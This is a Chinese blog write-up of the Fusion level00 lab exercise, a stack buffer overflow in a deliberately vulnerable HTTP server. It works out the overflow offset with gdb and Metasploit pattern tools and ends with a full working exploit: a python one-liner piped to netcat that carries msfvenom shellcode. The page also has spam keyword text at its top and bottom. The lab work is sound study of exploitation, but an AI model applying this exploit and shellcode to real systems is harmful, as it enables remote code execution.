91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Fusion level00

發布時間:2020-07-20 10:56:34 來源:網絡 閱讀:1802 作者:terrying 欄目:安全技術

經過半個多月的時間把Protostar完成了,休息了幾天,繼續做Fusion。

*********題外話開始**********

在大學期間就在糾結是否選擇程序猿的道路,結果因長時間高負荷寫代碼會引發不適而放棄了,不得不贊一下調好一個BUG時那種feel。如今,當完成一道題目也會有這種feel~~~~

*********題外話結束**********

level00源碼:

#include "../common/common.c"
int fix_path(char *path)
{
 char resolved[128];
 if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
 strcpy(path, resolved);
}
char *parse_http_request()
{
 char buffer[1024];
 char *path;
 char *q;
 printf("[debug] buffer is at 0x%08x :-)\n", buffer);
 if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
 if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");
 path = &buffer[4];
 q = strchr(path, ' ');
 if(! q) errx(0, "No protocol version specified");
 *q++ = 0;
 if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
 fix_path(path);
 printf("trying to access %s\n", path);
 return path;
}
int main(int argc, char **argv, char **envp)
{
 int fd;
 char *p;
 background_process(NAME, UID, GID);
 fd = serve_forever(PORT);
 set_io(fd);
 parse_http_request();
}

Fusion的題目是Protostar的進階版,難度也更難了,當然,level00還是個熱身題。通過題目提示知道是個Stack問題,而且shellcode應該放在resolved之外。


既然是Stack問題,那就來個長點的字符串吧。

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

######################################################################

# 修改core文件生成路徑的方法是: #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #

######################################################################

通過gdb來查看core文件

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)

用pattern_offset.rb工具:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
139

由此可以得到溢出的字符修改EIP的位置在長度139的位置

接下來需要在輸入中放進shellcode,通過core文件找到shellcode的位置。

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


可以得到寫的字符串從0xbf89b3d5開始記錄。同樣,在shellcode前面填充一些0x90。因此得到的payload格式應該是這樣的:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

先獲得一個shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";


于是乎:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/




向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

沁水县| 荥阳市| 克山县| 温泉县| 浮山县| 江北区| 沅陵县| 渭源县| 汪清县| 汉寿县| 宁陕县| 包头市| 姜堰市| 江津市| 水城县| 奎屯市| 千阳县| 安平县| 孟津县| 马鞍山市| 郴州市| 郁南县| 罗定市| 巴南区| 常德市| 宣恩县| 扶余县| 中牟县| 家居| 芦山县| 博客| 马尔康县| 轮台县| 湖北省| 社会| 方城县| 武清区| 高青县| 库车县| 云霄县| 麻城市|